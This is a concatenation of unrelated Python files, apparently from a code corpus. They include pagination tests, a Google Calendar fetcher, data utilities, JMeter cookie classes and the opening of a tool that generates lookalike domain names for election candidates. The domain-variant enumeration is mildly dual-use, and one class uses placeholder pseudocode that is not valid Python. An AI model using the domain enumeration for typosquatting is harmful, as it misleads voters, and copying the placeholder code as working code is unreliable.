parent='projects/goose', page_size=1, order_by='boks', query='hay')
with self.assertRaises(exceptions.PageTokenException):
paginate.ValidateAndParsePageToken(token, request_cont_diff)
def testValidateAndParsePageToken_InvalidSerializedToken(self):
request_cont = secrets_pb2.ListRequestContents()
with self.assertRaises(exceptions.PageTokenException):
paginate.ValidateAndParsePageToken('sldkfj87', request_cont)
def testValidateAndParsePageToken_InvalidTokenFormat(self):
request_cont = secrets_pb2.ListRequestContents()
with self.assertRaises(exceptions.PageTokenException):
paginate.ValidateAndParsePageToken('///sldkfj87', request_cont)
class PaginateTest(unittest.TestCase):
def testVirtualPagination(self):
# Paginating 0 results on a page that can hold 100.
mr = testing_helpers.MakeMonorailRequest(path='/issues/list')
total_count = 0
items_per_page = 100
start = 0
vp = paginate.VirtualPagination(total_count, items_per_page, start)
self.assertEqual(vp.num, 100)
self.assertEqual(vp.start, 1)
self.assertEqual(vp.last, 0)
self.assertFalse(vp.visible)
# Paginating 12 results on a page that can hold 100.
mr = testing_helpers.MakeMonorailRequest(path='/issues/list')
vp = paginate.VirtualPagination(12, 100, 0)
self.assertEqual(vp.num, 100)
self.assertEqual(vp.start, 1)
self.assertEqual(vp.last, 12)
self.assertTrue(vp.visible)
# Paginating 12 results on a page that can hold 10.
mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=10')
vp = paginate.VirtualPagination(12, 10, 0)
self.assertEqual(vp.num, 10)
self.assertEqual(vp.start, 1)
self.assertEqual(vp.last, 10)
self.assertTrue(vp.visible)
# Paginating 12 results starting at 5 on page that can hold 10.
mr = testing_helpers.MakeMonorailRequest(
path='/issues/list?start=5&num=10')
vp = paginate.VirtualPagination(12, 10, 5)
self.assertEqual(vp.num, 10)
self.assertEqual(vp.start, 6)
self.assertEqual(vp.last, 12)
self.assertTrue(vp.visible)
# Paginating 123 results on a page that can hold 100.
mr = testing_helpers.MakeMonorailRequest(path='/issues/list')
vp = paginate.VirtualPagination(123, 100, 0)
self.assertEqual(vp.num, 100)
self.assertEqual(vp.start, 1)
self.assertEqual(vp.last, 100)
self.assertTrue(vp.visible)
# Paginating 123 results on second page that can hold 100.
mr = testing_helpers.MakeMonorailRequest(path='/issues/list?start=100')
vp = paginate.VirtualPagination(123, 100, 100)
self.assertEqual(vp.num, 100)
self.assertEqual(vp.start, 101)
self.assertEqual(vp.last, 123)
self.assertTrue(vp.visible)
# Paginating a huge number of objects will show at most 1000 per page.
mr = testing_helpers.MakeMonorailRequest(path='/issues/list?num=9999')
vp = paginate.VirtualPagination(12345, 9999, 0)
self.assertEqual(vp.num, 1000)
self.assertEqual(vp.start, 1)
self.assertEqual(vp.last, 1000)
self.assertTrue(vp.visible)
# Test urls for a hotlist pagination
mr = testing_helpers.MakeMonorailRequest(
path='/u/hotlists/17?num=5&start=4')
mr.hotlist_id = 17
mr.auth.user_id = 112
vp = paginate.VirtualPagination(12, 5, 4,
list_page_url='/u/112/hotlists/17')
self.assertEqual(vp.num, 5)
self.assertEqual(vp.start, 5)
self.assertEqual(vp.last, 9)
self.assertTrue(vp.visible)
self.assertEqual('/u/112/hotlists/17?num=5&start=9', vp.next_url)
self.assertEqual('/u/112/hotlists/17?num=5&start=0', vp.prev_url)
| 5,563 | 2,070 |
################################################################################
"""
DJ JOE Website Availability Calendar
------------------------------------
(c) 2021 - Stanley Solutions - Joe Stanley
This application serves the React frontend required to demonstrate the available
dates for DJ Joe Services.
"""
################################################################################
# Import Requisites
import os
import datetime
import requests
from date_support import daterange, _clean_dates, _restore_datetimes
ENV_API_KEY = "GOOGLE_API_KEY"
BASE_URL = (
"https://clients6.google.com/calendar/v3/calendars/engineerjoe440@gmail.com"
"/events?calendarId=engineerjoe440%40gmail.com&singleEvents=true&timeZone="
"America%2FLos_Angeles&maxAttendees=1&maxResults=250&sanitizeHtml=true&"
"timeMin={TIME_MIN}&timeMax={TIME_MAX}&key={API_KEY}"
)
################################################################################
# Supporting Functions
def googlify_datetimes(dts):
dts = _restore_datetimes(_clean_dates(dts))
return [dt.isoformat()+"Z" for dt in dts]
def get_google_date(google_dt_dict):
"""Performs dictionary-specific handling to attempt extraction of dt."""
google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date'))
return google_dt.split("T")[0]
def get_google_time(google_dt_dict):
"""Performs dictionary-specific handling to attempt extraction of dt."""
google_dt = google_dt_dict.get('dateTime', google_dt_dict.get('date'))
try:
timestring = google_dt.split("T")[1].split('-')[0]
except IndexError:
timestring = "00:00:00"
return timestring
################################################################################
# Event Listing Functions
def get_event_list(start: datetime.datetime, end: datetime.datetime):
"""Identifies a list of all events in the specified date range."""
start, end = googlify_datetimes([start, end])
# Call the Calendar API
REQ_URL = BASE_URL.format(
TIME_MIN = start,
TIME_MAX = end,
API_KEY = os.getenv(ENV_API_KEY),
)
print(REQ_URL)
resp = requests.get(REQ_URL)
if resp.status_code == 200:
return resp.json().get('items', [])
else:
print(
"GOOGLE REQUEST FAILED:",
resp.status_code,
resp.reason,
)
return []
def get_occupied_dates(start: datetime.datetime, end: datetime.datetime):
"""Generates a list of single dt objects representing occupied dates."""
events = get_event_list(start=start, end=end)
occupied_dates = []
# Iteratively process each event
for event in events:
start_date = datetime.datetime.strptime(
get_google_date(event['start']),
"%Y-%m-%d",
)
end = event.get('end')
if end != None:
end_date = get_google_date(end)
end_time = datetime.datetime.strptime(get_google_time(end), "%H:%M:%S")
if end_date != None and end_time.hour != 0:
end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d")
for date in daterange(start_date, end_date):
# Append all dates in range
occupied_dates.append(date)
else:
# Append only start date
occupied_dates.append(start_date)
else:
# Append only start date
occupied_dates.append(start_date)
return occupied_dates
if __name__ == '__main__':
now = datetime.datetime.now() - datetime.timedelta(days=20)
events = get_event_list(now, now + datetime.timedelta(days=30))
for event in events:
print(event['start'].get('dateTime', event['start'].get('date')))
if len(events) == 0:
print("NO EVENTS FOUND")
events = get_occupied_dates(now, now + datetime.timedelta(days=30))
for event in events:
print("event", event)
if len(events) == 0:
print("NO EVENTS FOUND") | 4,022 | 1,222 |
from pathlib import Path
import numpy as np
import random
import subprocess
from typing import *
from .IOUtils import IOUtils
class Stream:
"""
Streams help manipulate sequences of objects.
"""
def __init__(self):
self.items = list()
return
@classmethod
def of(cls, one_or_more_items):
"""
Get a new stream from the item / items.
:param one_or_more_items: is converted to list with builtin `list` function.
"""
stream = Stream()
if one_or_more_items is not None:
stream.items = list(one_or_more_items)
# end if, if
return stream
@classmethod
def of_files(cls, dir_path: Union[str, Path]):
"""
Get a stream of the files under the directory.
"""
with IOUtils.cd(dir_path):
cmd_find = "find -mindepth 1 -maxdepth 1 -type f"
files = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1]
# end with
files = [file[2:] for file in files]
stream = cls.of(files)
stream.sorted()
return stream
@classmethod
def of_dirs(cls, dir_path: Union[str, Path]):
"""
Get a stream of the sub-directories under the directory.
"""
with IOUtils.cd(dir_path):
cmd_find = "find -mindepth 1 -maxdepth 1 -type d"
dirs = subprocess.run(["bash","-c",cmd_find], stdout=subprocess.PIPE).stdout.decode("utf-8").split("\n")[:-1]
# end with
dirs = [dir[2:] for dir in dirs]
stream = cls.of(dirs)
stream.sorted()
return stream
def filter(self, predicate_func: Callable[[object], bool]):
"""
Returns a stream consisting of the elements of this stream that match the given predicate.
"""
return Stream.of(item for item in self.items if predicate_func(item))
def count(self):
return sum(self.items)
def reduce(self, count_func: Callable[[str], float] = lambda x: 1):
return sum([count_func(f) for f in self.items])
def sorted(self, key: Callable[[str], object] = lambda f: f,
reverse: bool = False):
"""
Sorts the list of files in the dataset.
"""
list.sort(self.items, key=key, reverse=reverse)
return self
def map(self, map_func: Callable[[str], object],
errors: str = "raise", default: object = ""):
def new_items_generator():
for item in self.items:
try:
new_item = map_func(item)
except:
if errors == "ignore":
yield default
else:
raise
else:
yield new_item
# end for
# end def
return Stream.of(new_items_generator())
def peak(self, peak_func: Callable[[str], None],
errors: str = "ignore"):
for item in self.items:
try:
peak_func(item)
except:
if errors == "ignore":
continue
else:
raise
# end for
return self
def split(self, fraction_list: List[float],
count_func: Callable[[str], float] = lambda x: 1):
"""
Splits the dataset as each part specified by the fractions (assumed to sum up to 1).
Splitting is done by finding the cutting points. If randomization is needed, call shuffle first.
:param count_func: customize the number of data counts in each file.
"""
if self.is_empty():
return tuple(Stream() for i in range(len(fraction_list)))
count_list = [count_func(f) for f in self.items]
cum_count_list = np.cumsum(count_list)
cum_expected_count_list = [f * cum_count_list[-1] for f in np.cumsum(fraction_list)]
cut_index_list = []
last_i = 0
for i, cum_count in enumerate(cum_count_list):
if cum_count >= cum_expected_count_list[len(cut_index_list)]:
last_i = i+1
cut_index_list.append(i+1)
if len(cut_index_list) >= len(cum_expected_count_list):
break
# end if
# end for if
if last_i != len(cum_count_list):
cut_index_list.append(len(cum_count_list))
# end if
cut_index_list.insert(0,0)
return tuple(Stream.of(self.items[cut_index_list[i]:cut_index_list[i + 1]]) for i in range(len(cut_index_list) - 1))
def shuffle(self, seed=None):
"""
Shuffles the list of files in the dataset.
"""
random.seed(seed)
random.shuffle(self.items)
return self
def get(self, index: int):
return self.items[index]
def is_empty(self):
return len(self.items) == 0
def __getitem__(self, item):
new_items = self.items.__getitem__(item)
if not isinstance(item, slice):
new_items = [new_items]
return Stream.of(new_items)
def __setitem__(self, key, value):
return self.items.__setitem__(key, value)
def __delitem__(self, key):
return self.items.__delitem__(key)
def __iter__(self):
return self.items.__iter__()
def __len__(self):
return self.items.__len__()
def __str__(self):
return "Stream with {} items".format(len(self.items))
def __repr__(self):
return self.__str__()
def __add__(self, other):
if isinstance(other, Stream):
return Stream.of(self.items+other.items)
else:
raise NotImplementedError
| 5,764 | 1,699 |
# Copyright (2013) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government
# retains certain rights in this software.
#
# This software is released under the FreeBSD license as described
# in License.txt
import time
import string
import subprocess
import os
import tempfile
from multiprocessing import Process
import _gui
from _gui import FakeFile
import json # Python 2.6 or later
def createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix):
file = tempfile.NamedTemporaryFile(delete=False, suffix='.yml')
_gui.writeLine(file,"# written using dinesti web gui")
_gui.writeLine(file,"")
_gui.writeLine(file,"network:")
_gui.writeLine(file," epanet file: " + fINP.name)
#_gui.writeLine(file," wqm file: " + fWQM.name) # moved to grabsample section
#_gui.writeLine(file," hydraulic timestep: None") # no longer available
_gui.writeLine(file," water quality timestep: None")
_gui.writeLine(file," simulation duration: None")
_gui.writeLine(file,"")
_gui.writeLine(file,"scenario:") # used to be called 'events'
_gui.writeLine(file," scn file: " + fSCN.name) # for _inversion LP (optimization)
_gui.writeLine(file," tsg file: " + fTSG.name) # for _inversion STEP (optmization)
_gui.writeLine(file," ignore merlion warnings: False") # moved from network section
_gui.writeLine(file,"")
#_gui.writeLine(file,"solver:")
#_gui.writeLine(file," cplex:")
#_gui.writeLine(file," mipgap: 0.02")
#_gui.writeLine(file," threads: 1")
_gui.writeLine(file,"")
#_gui.writeLine(file,"samplelocation:")
_gui.writeLine(file,"grabsample:")
_gui.writeLine(file," wqm file: " + fWQM.name) # moved from network section
_gui.writeLine(file," model format: PYOMO") # AMPL or PYOMO
_gui.writeLine(file," sample time: " + str(dSampleTime / 60)) # minutes
_gui.writeLine(file," threshold: 0.01") # default = 0.001
_gui.writeLine(file," fixed sensor file: " + fSEN.name)
#_gui.writeLine(file," not allowed locations file: None") # no longer available
_gui.writeLine(file," allowed locations file: " + fNodes.name) # TODO
_gui.writeLine(file," N samples: " + str(nSampleCount)) # default = 3
_gui.writeLine(file," greedy selection: True")
_gui.writeLine(file,"")
_gui.writeLine(file,"configure:")
_gui.writeLine(file," ampl executable: ampl")#" + sInstallDir + "bin/ampl")
_gui.writeLine(file," pyomo executable: pyomo")#" + sInstallDir + "bin/pyomo")
_gui.writeLine(file," output prefix: " + sOutputPrefix)
_gui.writeLine(file,"")
#_gui.writeLine(file,"internal:")
#_gui.writeLine(file," nodeNames: None")
#_gui.writeLine(file," nodeIndices: None")
return file
def createInpFile(data):
text = _gui.getFile(data["docId"], data["fileName"])
temp = tempfile.NamedTemporaryFile(delete=False, suffix='.inp')
temp.write(text)
return temp
def createScnFile(uuid):
return FakeFile()
def createTsgFile(uuid):
temp = tempfile.NamedTemporaryFile(delete=False, suffix='.tsg')
data = _gui.getView("m_ScenariosList?key=\"" + uuid + "\"")
for row in data["rows"]:
text = _gui.getFile(row["id"], row["value"]["fileName"])
temp.write(text + "\n")
return temp
def createSenFile(uuid):
temp = tempfile.NamedTemporaryFile(delete=False, suffix='.sen')
doc = _gui.getDoc(uuid)
sensors = _gui.getValue(doc, "sensors", "")
sensors = sensors.split("\n")
bFirst = True
for line in sensors:
s = line.strip()
if len(s) > 0:
if not bFirst:
temp.write("\n")
bFirst = False
temp.write(s)
return temp
def createNodesFile(Nodes):
temp = tempfile.NamedTemporaryFile(delete=False, suffix='.nodes')
for node in Nodes:
temp.write(node + "\n")
return temp
def runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix):
nStart = time.time()
sInstallDir = _gui.getInstallDir()
args = [sInstallDir + "python/bin/wst", "grabsample", fYML.name]
#
p = subprocess.Popen(args, stdout=subprocess.PIPE)
doc = _gui.getDoc(sUuid)
sampleTime = doc.get("sampleTime")
inp_info = doc.get("docFile_INP")
duration = inp_info.get("duration")
bErrorOverTime = False
if sampleTime <> None and duration <> None:
if sampleTime > duration:
bErrorOverTime = True
doc["pid"] = str(p.pid)
doc["status"] = "Running"
res = _gui.setDoc(doc)
#doc = _gui.getDoc(sUuid)
com = p.communicate()
sOut = com[0]
#
sFile = sOutputPrefix + "_grabsample_results.json"
results = _gui.readJsonFile(sFile, {"Error": "output file was not created: " + sFile})
sOUT = sOutputPrefix + "_samplelocation.out"
debug_text_out_file = _gui.readFile(sOUT)
doc = _gui.getDoc(sUuid)
bError = False
if bErrorOverTime:
sError = "the sample time is after the end of the simulation."
results = {"Error": sError}
doc["Error"] = sError
bError = True
elif results.get("Error") <> None:
doc["Error"] = results["Error"]
bError = True
doc["results"] = results
doc["results"]["sampleTime"] = results.get("sampleTime", 0) * 60 # TODO - this should be changed in the grabsample executable
doc["debug_fileSCN"] = fSCN.name
doc["debug_fileTSG"] = fTSG.name
doc["debug_stdout"] = com[0]
doc["returnCode"] = p.returncode
doc["debug_text_out_file"] = debug_text_out_file
#
if com[1] == None:
doc["debug_stderr"] = "\0"
else:
doc["debug_stderr"] = com[1]
#
sKill = "Signal handler called from"
index = string.find(sOut, sKill)
doc["debug_stdout_find_error_index"] = index
#
if _gui.bDeleteTempFiles(override=None):
_gui.removeFiles([fWQM, fTSG, fSCN, fINP, fSEN, fNodes, fYML])
_gui.removeFile(sOutputPrefix + "_epanet.rpt")
_gui.removeFile(sOutputPrefix + "_samplelocation.out")
_gui.removeFile(sOutputPrefix + "_samplelocation.log")
_gui.removeFile(sOutputPrefix + "_MERLION_LABEL_MAP.txt")
_gui.removeFile(sOutputPrefix + "_GSP.dat")
_gui.removeFile(sOutputPrefix + "_ampl.run")
_gui.removeFile(sOutputPrefix + "_ampl.out")
_gui.removeFile(sOutputPrefix + "_grabsample_results.dat")
_gui.removeFile(sOutputPrefix + "_grabsample_results.json")
#
if index == -1 and p.returncode == 0:
doc["status"] = "Complete"
elif index == -1 or bError:
doc["status"] = "Error"
else:
doc["status"] = "Stopped"
#
doc["timer"] = time.time() - nStart
_gui.setDoc(sUuid, doc)
return doc
def runThreaded(doc, sOutputPrefix, bThreaded=True):
sUuid = doc["_id"]
dSampleTime = doc.get("sampleTime", 0)
nSampleCount = doc.get("sampleCount", 3)
docFile_INP = doc.get("docFile_INP")
Nodes = doc.get("Nodes" )
fWQM = _gui.createWqmFile(docFile_INP)
if fWQM == None:
fINP = createInpFile(docFile_INP)
fWQM = FakeFile()
else:
fINP = FakeFile()
fSCN = createScnFile(sUuid) # FakeFile
fTSG = createTsgFile(sUuid)
fSEN = createSenFile(sUuid)
if Nodes == None:
fNodes = FakeFile()
else:
fNodes = createNodesFile(Nodes)
fYML = createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix)
_gui.closeFiles([fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML])
#
if bThreaded:
p = Process(target=runWst, args=(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix, ))
p.start()
else:
return runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix)
return
def run(sCall, sUuid, bThreaded=True):
if sCall == "delete":
return False
if sCall == "rename":
return False
sDir = tempfile.gettempdir()
os.chdir(sDir)
doc = _gui.getDoc(sUuid)
runThreaded(doc, sUuid, True)
return _gui.respondJSON(json.dumps({}))
def main():
_gui.setHost()
for req in _gui.getRequests():
sDb = _gui.getQuery(req, "db")
_gui.setDatabase(sDb)
sCall = _gui.getQuery(req, "call")
sUuid = _gui.getQuery(req, "uuid")
bRetVal = run(sCall, sUuid, True)
if bRetVal: continue
_gui.respondJSON(json.dumps({}))
if __name__ == "__main__":
main()
| 7,789 | 3,091 |
from discord.ext import commands
from configparser import ConfigParser
parser = ConfigParser()
parser.read("config.txt")
TOKEN = parser.get('config', 'token')
bot = commands.Bot(command_prefix='!')
bot.load_extension("Webhook")
bot.run(TOKEN)
| 246 | 81 |
from components.ghost.blogPage import BlogPage
from components.ghost.adminPanelPage import AdminPanelPage
class TestBlogPage(BlogPage):
def test_01_open_blog_page(self):
self.go_to()
assert self.get_title() == "Blog for Testing"
class TestAdminPanelPage(AdminPanelPage):
def test_01_open_admin_panel_page(self):
self.go_to()
assert self.is_log_in_required()
def test_02_log_in_to_admin_panel(self):
self.go_to()
self.log_in_as_admin()
assert not self.is_log_in_required()
self.logOut()
| 567 | 196 |
"""
{
'type': 'user',
'user_id': (encrypted user id),
'name': (first name),
'review_count': (review count),
'average_stars': (floating point average, like 4.31),
'votes': {(vote type): (count)},
'friends': [(friend user_ids)],
'elite': [(years_elite)],
'yelping_since': (date, formatted like '2012-03'),
'compliments': {
(compliment_type): (num_compliments_of_this_type),
...
},
'fans': (num_fans),
}
"""
import json
def main(f, o):
with open(f, 'r') as fp:
res = []
out = open(o, 'w')
for u in fp.read().splitlines():
user = json.loads(u)
d = {}
d['_id'] = user['user_id']
d['name'] = user['name']
d['review_count'] = user['review_count']
d['friends_count'] = len(user['friends'])
res.append(json.dumps(d))
out.write('[' + ',\n'.join(res) + ']')
out.close()
if __name__ == '__main__':
main('../dataset/user.json', '../dataset/out.json')
| 1,038 | 385 |
# NanoSciTracker - 2020
# Author: Luis G. Leon Vega <luis@luisleon.me>
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This project was sponsored by CNR-IOM
import copy
import cv2 as cv
import LocalTracker.detector as Detector
import LocalTracker.drawutils as DrawUtils
import LocalTracker.tracker as Tracker
import LocalTracker.matcher as DetectionMatcher
import Matcher.matcher as FeatureMatcher
class Scene:
def __init__(
self,
ROI=None,
overlap=0,
detection_sampling=3,
detection_roi=None,
settings=None
):
# Get coordinates
self.roi = ROI
x, y = self.roi
self.x0, self.x1 = x
self.y0, self.y1 = y
self.w = self.x1 - self.x0
self.h = self.y1 - self.y0
self.overlap = overlap
self.frame = None
# ROIs
if detection_roi is None:
self.detection_roi = (
self.overlap,
self.overlap,
self.w - self.overlap,
self.h - self.overlap,
)
else:
self.detection_roi = detection_roi
# BBs
self.trackers = []
self.detections = []
self.new_detections = []
self.trackers_new_detections = []
self.trackers_out_scene = []
self.dead_trackers = []
# Settings
self._settings = settings
if settings is None:
raise RuntimeError("Scene settings are not valid")
self.batches = self._settings.set_if_defined("batches", 2)
self.grayscale = self._settings.set_if_defined("grayscale", True)
self.world_size = self._settings.set_if_defined("world_size", None)
self.counter = 0
self.detection_sampling = detection_sampling
def load_frame(self, frame):
self.frame = frame
def detect(self, gray_frame):
padding = self._settings.set_if_defined("padding", None)
return Detector.detect(gray_frame, self.batches, padding=padding)
def track(self, colour_frame):
Tracker.updateTrackers(colour_frame, self.trackers, ROI=self.detection_roi)
return Tracker.retrieveBBs(self.trackers)
def update(self, colour_frame=None):
if not colour_frame is None:
self.frame = colour_frame
gray_detect = cv.cvtColor(self.frame, cv.COLOR_BGR2GRAY)
# Perform detections and filter the new ones
if self.counter % self.detection_sampling == 0:
self.detections = self.detect(gray_detect)
self.new_detections = DetectionMatcher.inter_match(
self.detections, self.trackers
)
# Deploy new trackers accordingly
self.trackers_new_detections = Tracker.deployTrackers(
self.frame,
self.new_detections,
self.trackers,
ROI=self.detection_roi,
offset=(self.x0, self.y0),
grayscale=self.grayscale,
world_size=self.world_size,
)
else:
self.new_detections = []
self.trackers_new_detections = []
# Perform tracking update
self.track(self.frame)
# Catch trackers which went out of scene
self.trackers_out_scene = Tracker.retrieveOutScene(self.trackers)
self.dead_trackers = Tracker.retrieveDeadTrackers(self.trackers)
self.counter += 1
return (
self.trackers,
self.trackers_out_scene,
self.trackers_new_detections,
self.dead_trackers,
)
def draw(self, colour_frame):
"""
Purple: New detections
Red: Detections
Blue: Trackers
Light blue: Out of scene
"""
colour_copy = copy.deepcopy(colour_frame)
# Draw detections
colour_copy = DrawUtils.draw_detections(
colour_copy, self.new_detections, (255, 0, 255)
)
colour_copy = DrawUtils.draw_detections(
colour_copy, self.detections, (0, 0, 255)
)
# Draw trackers
colour_copy = DrawUtils.draw_trackers(colour_copy, self.trackers, (255, 0, 0))
colour_copy = DrawUtils.draw_trackers(
colour_copy, self.trackers_out_scene, (255, 255, 0)
)
return colour_copy
| 5,085 | 1,565 |
from abc import ABC, abstractmethod
class Shape(ABC):
@abstractmethod
def calculate_area(self):
pass
@abstractmethod
def draw(self):
pass
class Rectangle(Shape):
def __init__(self, ...):
...
def calculate_area(self):
# concrete implementation here
| 310 | 89 |
import logging
from typing import List, Optional
from enum import Enum
from xml.etree.ElementTree import Element
from jmeter_api.basics.config.elements import BasicConfig
from jmeter_api.basics.utils import Renderable, FileEncoding, tree_to_str
class CookiePolicy(Enum):
STANDARD = 'standard'
STANDARD_STRICT = 'standard-strict'
IGNORE = 'ignoreCookies'
NETSCAPE = 'netscape'
DEFAULT = 'default'
RFC2109 = 'rfc2109'
RFC2965 = 'RFC2965'
BEST_MATCH = 'best-match'
class Cookie(Renderable):
TEMPLATE = 'cookie.xml'
root_element_name = 'elementProp'
def __init__(self, *,
name: str,
value: str,
domain: str = '',
path: str = '',
secure: bool = False,
expires: int = 0,
path_specified: bool = True,
domain_specified: bool = True):
self.name = name
self.value = value
self.domain = domain
self.path = path
self.secure = secure
self.expires = expires
self.path_specified = path_specified
self.domain_specified = domain_specified
@property
def name(self) -> str:
return self._name
@name.setter
def name(self, value):
if not isinstance(value, str):
raise TypeError(
f'name must be str. {type(value).__name__} was given')
self._name = value
@property
def value(self) -> str:
return self._value
@value.setter
def value(self, value):
if not isinstance(value, str):
raise TypeError(
f'value must be str. {type(value).__name__} was given')
self._value = value
@property
def domain(self) -> str:
return self._domain
@domain.setter
def domain(self, value):
if not isinstance(value, str):
raise TypeError(
f'domain must be str. {type(value).__name__} was given')
self._domain = value
@property
def path(self) -> str:
return self._path
@path.setter
def path(self, value):
if not isinstance(value, str):
raise TypeError(
f'path must be str. {type(value).__name__} was given')
self._path = value
@property
def expires(self) -> str:
return self._expires
@expires.setter
def expires(self, value):
if not isinstance(value, int):
raise TypeError(
f'expires must be int. {type(value).__name__} was given')
self._expires = str(value)
@property
def secure(self) -> str:
return self._secure
@secure.setter
def secure(self, value):
if not isinstance(value, bool):
raise TypeError(
f'secure must be bool. {type(value).__name__} was given')
self._secure = str(value).lower()
@property
def path_specified(self) -> str:
return self._path_specified
@path_specified.setter
def path_specified(self, value):
if not isinstance(value, bool):
raise TypeError(
f'path_specified must be bool. {type(value).__name__} was given')
self._path_specified = str(value).lower()
@property
def domain_specified(self) -> str:
return self._domain_specified
@domain_specified.setter
def domain_specified(self, value):
if not isinstance(value, bool):
raise TypeError(
f'domain_specified must be bool. {type(value).__name__} was given')
self._domain_specified = str(value).lower()
def to_xml(self) -> str:
xml_tree: Optional[Element] = super().get_template()
element_root = xml_tree.find(self.root_element_name)
element_root.attrib['name'] = self.name
element_root.attrib['testname'] = self.name
for element in list(element_root):
try:
if element.attrib['name'] == 'Cookie.value':
element.text = self.value
elif element.attrib['name'] == 'Cookie.domain':
element.text = self.domain
elif element.attrib['name'] == 'Cookie.path':
element.text = self.path
elif element.attrib['name'] == 'Cookie.secure':
element.text = self.secure
elif element.attrib['name'] == 'Cookie.expires':
element.text = self.expires
elif element.attrib['name'] == 'Cookie.path_specified':
element.text = self.path_specified
elif element.attrib['name'] == 'Cookie.domain_specified':
element.text = self.domain_specified
except KeyError:
logging.error(
f'Unable to properly convert {self.__class__} to xml.')
return tree_to_str(xml_tree)
class HTTPCookieManager(BasicConfig, Renderable):
root_element_name = 'CookieManager'
def __init__(self, *,
cookies: List[Cookie] = [],
clear_each_iter: bool = False,
policy: CookiePolicy = CookiePolicy.STANDARD,
name: str = 'HTTP Cookie Manager',
comments: str = '',
is_enabled: bool = True):
self.cookies = cookies
self.policy = policy
self.clear_each_iter = clear_each_iter
super().__init__(name=name, comments=comments, is_enabled=is_enabled)
@property
def policy(self):
return self._policy
@policy.setter
def policy(self, value):
if not isinstance(value, CookiePolicy):
raise TypeError(
f'policy must be CookiePolicy. {type(value).__name__} was given')
self._policy = value
@property
def clear_each_iter(self) -> str:
return self._clear_each_iter
@clear_each_iter.setter
def clear_each_iter(self, value):
if not isinstance(value, bool):
raise TypeError(
f'clear_each_iter must be bool. {type(value).__name__} was given')
self._clear_each_iter = str(value).lower()
@property
def cookies(self) -> str:
return self._cookies
@cookies.setter
def cookies(self, value):
if not isinstance(value, List):
raise TypeError(
f'arguments must be List. {type(value).__name__} was given')
for el in value:
if not isinstance(el, Cookie):
raise TypeError(
f'arguments must contain only Cookie. {type(value).__name__} was given')
self._cookies = value
def to_xml(self) -> str:
element_root, xml_tree = super()._add_basics()
for element in list(element_root):
try:
if element.attrib['name'] == 'CookieManager.cookies':
element.text = ''
for arg in self.cookies:
element.text += arg.to_xml()
elif element.attrib['name'] == 'CookieManager.clearEachIteration':
element.text = self.clear_each_iter
except KeyError:
logging.error(
f'Unable to properly convert {self.__class__} to xml.')
if not self.policy is CookiePolicy.STANDARD:
el = Element('stringProp', attrib={'name': 'CookieManager.policy'})
el.text = str(self.policy.value)
element_root.append(el)
return tree_to_str(xml_tree)
| 7,573 | 2,145 |
#!/usr/bin/python3.5
##################################################
## Author: Joshua Franklin, Kevin Franklin
## Example input to start:
## sudo ./electionBuster.py -f josh -l franklin -y 2014 -e senate -s pennsyltucky
## 6 arguments are passed:
## 1: The first name of the candidate (mandatory)
## 2: The middle name of the candidate (optional)
## 2: The last name of the candidate (mandatory)
## 3: The year of the election (mandatory)
## 4: The type of race, such as congress, senate, or president. (mandatory)
## 5: The state or region the candidate is from (optional)
##################################################
#TODO: Add a keyboard interrupt
import requests
import sys
import time
import string
import argparse
import socket
from datetime import date
import urllib
from multiprocessing import Pool as ThreadPool, Manager
import collections
import csv
import operator
from modules.utils import genAllDonate,genAll,generate_urls, tryURLforReal
from modules.text_tools import alphabet,alt_alphabets,skipLetter,stringAndStrip,removeDups,reverseLetter,wrongVowel,tlds
confirmedURLs = Manager().list()
allURLS = Manager().list()
class NameDenormalizer(object):
def __init__(self, filename=None):
filename = filename or 'names.csv'
lookup = collections.defaultdict(list)
with open(filename) as f:
reader = csv.reader(f)
for line in reader:
matches = set(line)
for match in matches:
lookup[match].append(matches)
self.lookup = lookup
def __getitem__(self, name):
name = name.upper()
if name not in self.lookup:
raise KeyError(name)
return self.lookup[name]
def get(self, name, default=None):
try:
return self[name]
except KeyError:
return set( [name] )
# Program Timer
start_time = time.time()
# Function: casts and removes those pesky \r and \n
#Parse command line arguments
parser = argparse.ArgumentParser(description='Identifies registered candidate domains')
parser.add_argument('-f','--firstName', help='Candidate\'s first name',required=True)
parser.add_argument('-m','--middleName',help='Candidate\'s optional middle name')
parser.add_argument('-l','--lastName',help='Candidate\'s last name', required=True)
parser.add_argument('-y','--year', help='Year of the election',required=True)
parser.add_argument('-e','--electionType',help='Type of election (congress, senate, president)', required=True)
parser.add_argument('-s','--state', help='Candidate\'s state of origin', action='append' )
#Exists for candidates like Mitt Romney that possibly have an attachment to two states (i.e., Utah, Massachusetts)
parser.add_argument('-a','--aliasFileName', help='Filename containing a list of aliases')
parser.add_argument('-p','--party', help='Party Affiliation')
args = parser.parse_args()
# Stores command line argumetns
# Make all lowercase
fName = args.firstName
fName = fName.lower()
lName = args.lastName
lName = lName.lower()
party = ""
year = args.year
shortYear = year[-2:]
electionType = args.electionType
electionType = electionType.lower()
state = []
stateText = ""
if (args.party) :
party = args.party
fileName = "states.csv"
if (args.aliasFileName) :
fileName = stringAndStrip( args.aliasFileName)
if (args.state) :
nd = NameDenormalizer( fileName )
for aState in args.state:
stateText = stateText + aState.lower()
